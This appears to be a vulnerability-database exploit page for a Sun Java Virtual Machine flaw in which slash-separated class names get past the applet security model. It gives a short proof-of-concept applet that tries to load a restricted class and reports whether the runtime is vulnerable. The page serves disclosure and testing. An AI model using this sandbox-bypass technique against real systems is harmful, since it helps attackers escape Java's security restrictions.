• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability

The following proof-of-concept code has been made available by Alla Bezroutchko <alla@scanit.be>:

import java.applet.Applet;
import java.awt.Graphics;
import java.lang.Class;
import java.security.AccessControlException;

public class Simple extends Applet {

StringBuffer buffer;

public void init() {
buffer = new StringBuffer();
}

public void start() {
ClassLoader cl = this.getClass().getClassLoader();
try {
Class cla =
cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes
addItem("No exception in loadClass. Vulnerable!");
} catch (ClassNotFoundException e) {
addItem("ClassNotFoundException in loadClass - " + e);
} catch (AccessControlException e) {
addItem("AccessControlException in loadClass - Not
Vulnerable!");
}

}

void addItem(String newWord) {
System.out.println(newWord);
buffer.append(newWord);
repaint();
}

public void paint(Graphics g) {
//Draw a Rectangle around the applet's display area.
g.drawRect(0, 0, size().width - 1, size().height - 1);

//Draw the current string inside the rectangle.
g.drawString(buffer.toString(), 5, 15);
}
}